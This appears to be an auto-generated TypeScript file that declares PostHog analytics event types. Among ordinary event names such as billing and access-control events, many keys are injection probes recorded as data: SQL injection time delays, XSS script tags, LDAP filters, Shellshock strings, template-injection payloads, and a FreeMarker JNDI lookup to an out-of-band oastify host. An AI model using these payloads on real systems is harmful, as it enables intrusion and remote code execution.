/**
 * GENERATED FILE - DO NOT EDIT
 *
 * This file was auto-generated by PostHog
 * Generated at: 2025-11-04T05:55:37.291001
 * Generator version: 1.0.0
 *
 * Provides capture() for type-safe events and captureRaw() for flexibility
 */
import originalPostHog from 'posthog-js'
import type { CaptureOptions, CaptureResult, PostHog as OriginalPostHog, Properties } from 'posthog-js'

// Define event schemas with their required and optional fields
interface EventSchemas {
    '^(#$!@#$)(()))******': Record<string, any>
    '<!--': Record<string, any>
    '!(()&&!|*|*|': Record<string, any>
    '\'"': Record<string, any>
    '\'"()': Record<string, any>
    ')': Record<string, any>
    ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))': Record<string, any>
    '0': Record<string, any>
    '001_solver_36fff23599-test': Record<string, any>
    '008_solver_ff3c9dcede_external_dtd': Record<string, any>
    '008_solver_ff3c9dcede_file_test': Record<string, any>
    '008_solver_ff3c9dcede_test': Record<string, any>
    '008_solver_ff3c9dcede_xxe_test': Record<string, any>
    '008_solver_ff3c9dcede_xxe_test_batch': Record<string, any>
    '009_solver_13f4cd7cfe_advanced_rce': Record<string, any>
    '009_solver_13f4cd7cfe_internal_rce': Record<string, any>
    '009_solver_13f4cd7cfe_key_test': Record<string, any>
    '00yf3yds25x5ontble77av48uz0sorcj0hs4ir9fy.oastify.com': Record<string, any>
    '013_solver_27867df26c_stored_xss_test': Record<string, any>
    "08V5V6sR')) OR 391=(SELECT 391 FROM PG_SLEEP(15))--": Record<string, any>
    "0fUoUFK5')) OR 327=(SELECT 327 FROM PG_SLEEP(15))--": Record<string, any>
    "0ibfJ6M5')) OR 584=(SELECT 584 FROM PG_SLEEP(15))--": Record<string, any>
    '@@0JEKx': Record<string, any>
    '0ojapm31xy)(!(objectClass=*)': Record<string, any>
    '0QznUAsX': Record<string, any>
    "0UQP1MrF' OR 207=(SELECT 207 FROM PG_SLEEP(15))--": Record<string, any>
    "0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z": Record<string, any>
    '0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z': Record<string, any>
    '1': Record<string, any>
    '1\'"': Record<string, any>
    '123': Record<string, any>
    '130*7114': Record<string, any>
    '1bCQNhrtO': Record<string, any>
    '1FOCf0Bb': Record<string, any>
    '1FryA8HGO': Record<string, any>
    '1IFjy6VY': Record<string, any>
    '1KRLgvxO': Record<string, any>
    '1L5cZ428O': Record<string, any>
    '1LZZKr6YO': Record<string, any>
    '1M1tGbDN': Record<string, any>
    '-1" OR 2+10-10-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+113-113-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+116-116-1=0+0+0+1': Record<string, any>
    '-1 OR 2+124-124-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+124-124-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+126-126-1=0+0+0+1 or 'sb4PYhIc'='": Record<string, any>
    '-1" OR 2+127-127-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+141-141-1=0+0+0+1 or 'I5krDAkR'='": Record<string, any>
    '-1 OR 2+147-147-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+149-149-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+170-170-1=0+0+0+1 or '4mbFozkI'='": Record<string, any>
    '-1 OR 2+176-176-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+176-176-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+182-182-1=0+0+0+1': Record<string, any>
    '-1 OR 2+194-194-1=0+0+0+1': Record<string, any>
    '-1 OR 2+199-199-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+212-212-1=0+0+0+1': Record<string, any>
    "-1' OR 2+220-220-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+221-221-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+22-22-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+22-22-1=0+0+0+1 or 'sBbvMUVg'='": Record<string, any>
    '-1 OR 2+223-223-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+230-230-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+233-233-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+239-239-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+254-254-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+267-267-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+269-269-1=0+0+0+1 or 'nKEA7QnQ'='": Record<string, any>
    "-1' OR 2+270-270-1=0+0+0+1 -- ": Record<string, any>
    '-1" OR 2+278-278-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+279-279-1=0+0+0+1': Record<string, any>
    "-1' OR 2+282-282-1=0+0+0+1 or '3c3D31tt'='": Record<string, any>
    "-1' OR 2+285-285-1=0+0+0+1 or 'zY8X8w6Y'='": Record<string, any>
    '-1 OR 2+288-288-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+292-292-1=0+0+0+1 or 'ewArXbcD'='": Record<string, any>
    '-1 OR 2+294-294-1=0+0+0+1': Record<string, any>
    '-1 OR 2+306-306-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+31-31-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+313-313-1=0+0+0+1': Record<string, any>
    '-1 OR 2+318-318-1=0+0+0+1': Record<string, any>
    "-1' OR 2+322-322-1=0+0+0+1 -- ": Record<string, any>
    '-1" OR 2+324-324-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+328-328-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+330-330-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+33-33-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+335-335-1=0+0+0+1': Record<string, any>
    '-1 OR 2+335-335-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+356-356-1=0+0+0+1 or '9lM5QFTn'='": Record<string, any>
    '-1 OR 2+364-364-1=0+0+0+1': Record<string, any>
    '-1 OR 2+365-365-1=0+0+0+1': Record<string, any>
    "-1' OR 2+369-369-1=0+0+0+1 or '1sNpE60C'='": Record<string, any>
    '-1 OR 2+372-372-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+382-382-1=0+0+0+1': Record<string, any>
    "-1' OR 2+382-382-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+389-389-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+392-392-1=0+0+0+1 -- ": Record<string, any>
    '-1" OR 2+392-392-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+394-394-1=0+0+0+1': Record<string, any>
    "-1' OR 2+395-395-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+398-398-1=0+0+0+1 -- ": Record<string, any>
    '-1" OR 2+408-408-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+439-439-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+446-446-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+447-447-1=0+0+0+1 -- ": Record<string, any>
    '-1" OR 2+450-450-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+463-463-1=0+0+0+1 or '4poNnX4m'='": Record<string, any>
    '-1" OR 2+470-470-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+472-472-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+484-484-1=0+0+0+1 or '7WGHaqba'='": Record<string, any>
    "-1' OR 2+497-497-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+503-503-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+505-505-1=0+0+0+1': Record<string, any>
    '-1 OR 2+509-509-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+523-523-1=0+0+0+1 -- ": Record<string, any>
    '-1" OR 2+528-528-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+536-536-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+539-539-1=0+0+0+1 or 'D0cuCqe5'='": Record<string, any>
    '-1 OR 2+542-542-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+542-542-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+543-543-1=0+0+0+1 or 'aiFFsH2A'='": Record<string, any>
    '-1 OR 2+556-556-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+557-557-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+563-563-1=0+0+0+1': Record<string, any>
    "-1' OR 2+568-568-1=0+0+0+1 or 'gukwdczV'='": Record<string, any>
    '-1 OR 2+569-569-1=0+0+0+1': Record<string, any>
    '-1 OR 2+574-574-1=0+0+0+1': Record<string, any>
    "-1' OR 2+574-574-1=0+0+0+1 or '7PkefznJ'='": Record<string, any>
    "-1' OR 2+576-576-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+583-583-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+587-587-1=0+0+0+1 -- ": Record<string, any>
    '-1" OR 2+593-593-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+607-607-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+610-610-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+611-611-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+611-611-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+61-61-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+620-620-1=0+0+0+1': Record<string, any>
    "-1' OR 2+622-622-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+627-627-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+628-628-1=0+0+0+1': Record<string, any>
    '-1 OR 2+628-628-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+638-638-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+642-642-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+642-642-1=0+0+0+1 or 'Z5n0WxBh'='": Record<string, any>
    '-1" OR 2+644-644-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+645-645-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+648-648-1=0+0+0+1': Record<string, any>
    "-1' OR 2+648-648-1=0+0+0+1 or 'n0f0tIIi'='": Record<string, any>
    '-1 OR 2+654-654-1=0+0+0+1': Record<string, any>
    '-1" OR 2+660-660-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+665-665-1=0+0+0+1': Record<string, any>
    "-1' OR 2+66-66-1=0+0+0+1 or 'BHhGk4oG'='": Record<string, any>
    "-1' OR 2+667-667-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+668-668-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+677-677-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+68-68-1=0+0+0+1 or 'MYzhrH1z'='": Record<string, any>
    "-1' OR 2+688-688-1=0+0+0+1 or 'gLp0XNcx'='": Record<string, any>
    '-1 OR 2+697-697-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+70-70-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+711-711-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+714-714-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+725-725-1=0+0+0+1 or 'eHco2T0y'='": Record<string, any>
    '-1 OR 2+726-726-1=0+0+0+1': Record<string, any>
    '-1 OR 2+732-732-1=0+0+0+1': Record<string, any>
    "-1' OR 2+732-732-1=0+0+0+1 or '1r2Q1U79'='": Record<string, any>
    '-1" OR 2+733-733-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+736-736-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+738-738-1=0+0+0+1': Record<string, any>
    "-1' OR 2+745-745-1=0+0+0+1 or 'EnjDhq0l'='": Record<string, any>
    "-1' OR 2+74-74-1=0+0+0+1 -- ": Record<string, any>
    '-1" OR 2+750-750-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+761-761-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+768-768-1=0+0+0+1 or 'wOCNxEVn'='": Record<string, any>
    '-1 OR 2+769-769-1=0+0+0+1': Record<string, any>
    "-1' OR 2+775-775-1=0+0+0+1 or 'E9gIdjAn'='": Record<string, any>
    '-1" OR 2+777-777-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+783-783-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+785-785-1=0+0+0+1': Record<string, any>
    '-1" OR 2+787-787-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+789-789-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+791-791-1=0+0+0+1 -- ': Record<string, any>
    "-1' OR 2+791-791-1=0+0+0+1 or '0loeEIYL'='": Record<string, any>
    "-1' OR 2+803-803-1=0+0+0+1 or 'vG0bZC01'='": Record<string, any>
    "-1' OR 2+805-805-1=0+0+0+1 or 'nXlPSDxR'='": Record<string, any>
    '-1" OR 2+808-808-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+810-810-1=0+0+0+1': Record<string, any>
    "-1' OR 2+815-815-1=0+0+0+1 or 'x7jeMXQR'='": Record<string, any>
    '-1 OR 2+818-818-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+824-824-1=0+0+0+1': Record<string, any>
    "-1' OR 2+828-828-1=0+0+0+1 or 'xhFZRJuf'='": Record<string, any>
    "-1' OR 2+830-830-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+832-832-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+838-838-1=0+0+0+1 or 'SPNmLUiU'='": Record<string, any>
    '-1" OR 2+839-839-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+845-845-1=0+0+0+1': Record<string, any>
    "-1' OR 2+846-846-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+859-859-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+869-869-1=0+0+0+1': Record<string, any>
    "-1' OR 2+872-872-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+87-87-1=0+0+0+1': Record<string, any>
    "-1' OR 2+884-884-1=0+0+0+1 or 'IFOgeJfS'='": Record<string, any>
    "-1' OR 2+885-885-1=0+0+0+1 -- ": Record<string, any>
    "-1' OR 2+891-891-1=0+0+0+1 or '9fQJFE19'='": Record<string, any>
    '-1" OR 2+902-902-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+903-903-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+903-903-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+918-918-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+925-925-1=0+0+0+1': Record<string, any>
    '-1 OR 2+928-928-1=0+0+0+1': Record<string, any>
    "-1' OR 2+932-932-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+935-935-1=0+0+0+1': Record<string, any>
    "-1' OR 2+938-938-1=0+0+0+1 -- ": Record<string, any>
    '-1 OR 2+962-962-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+988-988-1=0+0+0+1 -- ': Record<string, any>
    '-1" OR 2+988-988-1=0+0+0+1 -- ': Record<string, any>
    '-1 OR 2+994-994-1=0+0+0+1': Record<string, any>
    "-1' OR 2+994-994-1=0+0+0+1 or 'VaktThKI'='": Record<string, any>
    "-1' OR 2+996-996-1=0+0+0+1 or '4xAyvAr8'='": Record<string, any>
    '1RaqdLCEO': Record<string, any>
    '1some_inexistent_file_with_long_name%00.jpg': Record<string, any>
    '@@1UDqB': Record<string, any>
    "1 waitfor delay '0:0:15' -- ": Record<string, any>
    '1XNdThy6O': Record<string, any>
    '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg': Record<string, any>
    '1zAD02Z6O': Record<string, any>
    '@@1zDKA': Record<string, any>
    '%{2265*2481}': Record<string, any>
    '28x2el7x2m)(objectClass=*': Record<string, any>
    '28z6vGcf': Record<string, any>
    "2eDEOk5E'; waitfor delay '0:0:15' -- ": Record<string, any>
    "2KC6vo8F') OR 135=(SELECT 135 FROM PG_SLEEP(15))--": Record<string, any>
    '2nttkQF7': Record<string, any>
    '3000 welcome acknowledged': Record<string, any>
    "36ny1OAS' OR 859=(SELECT 859 FROM PG_SLEEP(15))--": Record<string, any>
    "3Mdvv9La')) OR 875=(SELECT 875 FROM PG_SLEEP(15))--": Record<string, any>
    '3pyxWDHt': Record<string, any>
    '3zStcA2E': Record<string, any>
    '4cq05ft0yd)(!(objectClass=*)': Record<string, any>
    '5csJKapl': Record<string, any>
    "66DFtyna'; waitfor delay '0:0:15' -- ": Record<string, any>
    '@@6rYTY': Record<string, any>
    '6WP4uKg0': Record<string, any>
    '6zhz<!--esi-->zzkn<!--esx-->10f1': Record<string, any>
    "7R0fQhVB')) OR 90=(SELECT 90 FROM PG_SLEEP(15))--": Record<string, any>
    "7wwgyI6m' OR 305=(SELECT 305 FROM PG_SLEEP(15))--": Record<string, any>
    '@(8726*1714)': Record<string, any>
    "8bSmkDe4') OR 447=(SELECT 447 FROM PG_SLEEP(15))--": Record<string, any>
    "8ngTRK1E' OR 886=(SELECT 886 FROM PG_SLEEP(15))--": Record<string, any>
    "8QAYZg9K')) OR 266=(SELECT 266 FROM PG_SLEEP(15))--": Record<string, any>
    '9A2rluCq': Record<string, any>
    '9cdq3TiW': Record<string, any>
    "9h6sSloK' OR 352=(SELECT 352 FROM PG_SLEEP(15))--": Record<string, any>
    '9Nafhq89': Record<string, any>
    "a65sjEel') OR 495=(SELECT 495 FROM PG_SLEEP(15))--": Record<string, any>
    "a'a\\'b\"c>?>%}}%%>c<[[?${{%}}cake\\": Record<string, any>
    abe_test_event: Record<string, any>
    'access control default access level changed': Record<string, any>
    'access control member access level changed': Record<string, any>
    'access control popout cta clicked': Record<string, any>
    'access control role access level changed': Record<string, any>
    'access_control team setting updated': Record<string, any>
    'account owner clicked': Record<string, any>
    'action created': Record<string, any>
    action_performed: Record<string, any>
    'action updated': Record<string, any>
    'activation sidebar shown': Record<string, any>
    'activation sidebar task clicked': Record<string, any>
    'activation sidebar task completed': Record<string, any>
    'activation sidebar task skipped': Record<string, any>
    '\'"()&%<acx><ScRiPt >109B(9451)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >2OmX(9972)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >4Znf(9965)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >6Go9(9000)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >9pvc(9922)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >becW(9682)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >biHb(9843)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >c7gY(9940)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >cUQy(9356)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >dH5M(9900)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >Dl0n(9558)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >DNu5(9995)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >dWVU(9632)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >HUB8(9724)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >icZ0(9912)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >iplV(9747)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >JBxd(9510)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >jbYK(9477)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >jPmX(9651)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >JWyO(9257)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >LQrg(9576)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >m8Pl(9388)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >NBRr(9714)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >Ny85(9404)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >o4of(9861)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >pop7(9129)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >q2ag(9761)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >Se3P(9185)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >vXFK(9605)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >wEiO(9936)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >y6c9(9258)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >YjuK(9246)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >yNHV(9758)</ScRiPt>': Record<string, any>
    '\'"()&%<acx><ScRiPt >zD1T(9430)</ScRiPt>': Record<string, any>
    add_1_cart: Record<string, any>
    "AG0IWb5C' OR 726=(SELECT 726 FROM PG_SLEEP(15))--": Record<string, any>
    'ai burst rate limited': Record<string, any>
    'ai-error-fixer-failure': Record<string, any>
    'ai-error-fixer-success': Record<string, any>
    ai_filter_close: Record<string, any>
    ai_filter_error: Record<string, any>
    ai_filter_open: Record<string, any>
    ai_filter_redirect_maxai: Record<string, any>
    ai_filter_reset: Record<string, any>
    ai_filter_send: Record<string, any>
    ai_filter_success: Record<string, any>
    ai_hog_function_accepted: Record<string, any>
    ai_hog_function_filters_accepted: Record<string, any>
    ai_hog_function_filters_prompted: Record<string, any>
    ai_hog_function_filters_prompt_open: Record<string, any>
    ai_hog_function_filters_rejected: Record<string, any>
    ai_hog_function_inputs_accepted: Record<string, any>
    ai_hog_function_inputs_prompted: Record<string, any>
    ai_hog_function_inputs_prompt_open: Record<string, any>
    ai_hog_function_inputs_rejected: Record<string, any>
    ai_hog_function_prompted: Record<string, any>
    ai_hog_function_prompt_open: Record<string, any>
    ai_hog_function_rejected: Record<string, any>
    ai_query_accepted: Record<string, any>
    ai_query_prompt_open: Record<string, any>
    ai_query_rejected: Record<string, any>
    ai_regex_helper_generate_regex: Record<string, any>
    ai_regex_helper_generate_regex_error: Record<string, any>
    ai_regex_helper_generate_regex_success: Record<string, any>
    ai_regex_helper_generate_regex_unknown_error: Record<string, any>
    ai_regex_helper_open: Record<string, any>
    ai_survey_summary_rated: Record<string, any>
    'ai sustained rate limited': Record<string, any>
    'Alejandrin Johns': Record<string, any>
    'alert check': Record<string, any>
    'alert check backlog': Record<string, any>
    'alert check failed': Record<string, any>
    'Alessandro Wyman': Record<string, any>
    'Alexander Roberts': Record<string, any>
    'alpha test survey sent': Record<string, any>
    'alt click property filter added': Record<string, any>
    'Amalia Kuhic': Record<string, any>
    'Amelia Brekke': Record<string, any>
    'Amiya Bernhard': Record<string, any>
    'Amos Gerhold': Record<string, any>
    'anders testing': Record<string, any>
    'an event': Record<string, any>
    'Angel Metz': Record<string, any>
    'Angie Macejkovic': Record<string, any>
    animation_performance_reduced: Record<string, any>
    animation_performance_toast_action: Record<string, any>
    animation_performance_toast_shown: Record<string, any>
    'Annabel Lemke': Record<string, any>
    'annotation created': Record<string, any>
    'annotation updated': Record<string, any>
    'annotation viewed': Record<string, any>
    'annual plan credit purchase': Record<string, any>
    'anonymize_ips team setting updated': Record<string, any>
    API_Credential_Test_Successful_Revised: Record<string, any>
    'Application Backgrounded': Record<string, any>
    'Application Opened': Record<string, any>
    app_ready: Record<string, any>
    'app_urls team setting updated': Record<string, any>
    "ARvFa6xh')) OR 901=(SELECT 901 FROM PG_SLEEP(15))--": Record<string, any>
    asdf: Record<string, any>
    asdfasdf: Record<string, any>
    ";assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));": Record<string, any>
    'assertion execution': Record<string, any>
    '<#assign a="freemarker.template.utility.ObjectConstructor"?new()("javax.naming.InitialContext").lookup("rmi://dfw20ia7u87huy5ugrlpl0fl9cf43zunoncl48uvlja.oastify.com.:25/x")>': Record<
        string,
        any
    >
    'Async migration completed': Record<string, any>
    'Async migration error': Record<string, any>
    'Async migrations completed': Record<string, any>
    'Async migrations error': Record<string, any>
    'Async migrations start': Record<string, any>
    'Async migration start': Record<string, any>
    'a test event as a not posthog staff member': Record<string, any>
    'Aurelio Grant': Record<string, any>
    'autocapture_exceptions_errors_to_ignore team setting updated': Record<string, any>
    'autocapture_exceptions_opt_in team setting updated': Record<string, any>
    'autocapture exceptions toggled': Record<string, any>
    'autocapture_opt_out team setting updated': Record<string, any>
    'autocapture toggled': Record<string, any>
    'autocapture_web_vitals_allowed_metrics team setting updated': Record<string, any>
    'autocapture_web_vitals_opt_in team setting updated': Record<string, any>
    'axis units changed': Record<string, any>
    "B1UWQeRA') OR 982=(SELECT 982 FROM PG_SLEEP(15))--": Record<string, any>
    "B1XhNAGo')) OR 839=(SELECT 839 FROM PG_SLEEP(15))--": Record<string, any>
    baa_form_export: Record<string, any>
    back_in_stock_form_submitted: Record<string, any>
    'base_currency team setting updated': Record<string, any>
    batch_event_1: Record<string, any>
    batch_event_2: Record<string, any>
    'batch export disabled': Record<string, any>
    'batch export enabled': Record<string, any>
    'batch import created': Record<string, any>
    'Benedict Smith': Record<string, any>
    'ben-testing': Record<string, any>
    'ben-test-org-report': Record<string, any>
    'ben-test-org-report to billing service failure': Record<string, any>
    'beta - correlation analyzed': Record<string, any>
    'beta - correlation properties analyzed': Record<string, any>
    'beta - correlation properties viewed': Record<string, any>
    'beta - correlation viewed': Record<string, any>
    'beta test interest survey sent': Record<string, any>
    'Beth Bahringer': Record<string, any>
    'Bettie Cummerata': Record<string, any>
    '@@bG0Pn': Record<string, any>
    bGozSjL3: Record<string, any>
    "BHjzUBs6') OR 36=(SELECT 36 FROM PG_SLEEP(15))--": Record<string, any>
    'billing addon removed': Record<string, any>
    'billing addon subscription downgrade clicked': Record<string, any>
    'billing addon subscription upgrade clicked': Record<string, any>
    'billing alert action clicked': Record<string, any>
    'billing alert shown': Record<string, any>
    'billing card validated': Record<string, any>
    'billing CTA shown': Record<string, any>
    'billing customer created': Record<string, any>
    'billing customer updated via django admin': Record<string, any>
    'billing downgrade button clicked': Record<string, any>
    'billing email sent': Record<string, any>
    'billing free trial activated': Record<string, any>
    'billing invoice payment failed': Record<string, any>
    'billing license activated': Record<string, any>
    'billing limits reset': Record<string, any>
    'billing limits updated': Record<string, any>
    'billing locked screen shown': Record<string, any>
    'billing log': Record<string, any>
    'billing page regular': Record<string, any>
    'billing-page-thrifty': Record<string, any>
    'billing price comparison': Record<string, any>
    'billing price comparison completed': Record<string, any>
    'billing price comparison - customer migrated to comparison plan': Record<string, any>
    'billing price comparison - customer not migrated to comparison plan': Record<string, any>
    'billing price comparison dry run - would migrate': Record<string, any>
    'billing price comparison started': Record<string, any>
    'billing product activated': Record<string, any>
    'billing product deactivated': Record<string, any>
    'billing product plan migration - addon product activated': Record<string, any>
    'billing product plan migration completed': Record<string, any>
    'billing product plan migration - customer errored': Record<string, any>
    'billing product plan migration - free addon added to plans map': Record<string, any>
    'billing product plan migration - product deactivated': Record<string, any>
    'billing product plan migration - product deactivated and replaced with free plan': Record<string, any>
    'billing product plan migration - product removed from plans map': Record<string, any>
    'billing product plan migration - product(s) activated': Record<string, any>
    'billing product plan migration started': Record<string, any>
    'billing service usage report failure': Record<string, any>
    'billing spend interaction': Record<string, any>
    'billing subscription activated': Record<string, any>
    'billing subscription blocked': Record<string, any>
    'billing subscription block error shown': Record<string, any>
    'billing subscription cancelled': Record<string, any>
    'billing subscription invoice projected': Record<string, any>
    'billing subscription invoice projected failed': Record<string, any>
    'billing subscription paid': Record<string, any>
    'billing subscription plan switched': Record<string, any>
    'billing subscription unblocked': Record<string, any>
    'billing subscription upgraded to all paid': Record<string, any>
    'billing subscription upgraded to all paid products': Record<string, any>
    'billing synced to posthog': Record<string, any>
    'billing test event': Record<string, any>
    'billing test event 2': Record<string, any>
    'billing test event 3': Record<string, any>
    'billing test event 4': Record<string, any>
    'billing trial activated': Record<string, any>
    'billing trial cancelled': Record<string, any>
    'billing trial converted': Record<string, any>
    'billing trial expired': Record<string, any>
    'billing trial expiring soon': Record<string, any>
    'billing trial extended': Record<string, any>
    billing_unsubscribe_feature_list_expanded: Record<string, any>
    'billing upgrade button clicked': Record<string, any>
    'billing usage interaction': Record<string, any>
    'billing v2 shown': Record<string, any>
    '() { :;}; /bin/sleep 0': Record<string, any>
    '() { _; } >_[$($())] { /bin/sleep 11; }': Record<string, any>
    '() { :;}; /bin/sleep 11': Record<string, any>
    bla: Record<string, any>
    "BoKTqZXo'; waitfor delay '0:0:15' -- ": Record<string, any>
    'book a demo: clicked 1:1 demo': Record<string, any>
    'book a demo: clicked group demo': Record<string, any>
    'bookmarklet drag start': Record<string, any>
    bot_clicked_cta: Record<string, any>
    'bounce rate page view mode updated': Record<string, any>
    brand_mention: Record<string, any>
    'Brand Mention': Record<string, any>
    brand_mentioned: Record<string, any>
    btn_mevduat: Record<string, any>
    'bulk invite attempted': Record<string, any>
    'bulk invite executed': Record<string, any>
    button_clicked: Record<string, any>
    'bxss.me': Record<string, any>
    'bxss.me/t/xss.html?%00': Record<string, any>
    'cache warming - insights to cache': Record<string, any>
    'cache warming - warming insight': Record<string, any>
    'calendly event scheduled': Record<string, any>
    'calendly.event_scheduled': Record<string, any>
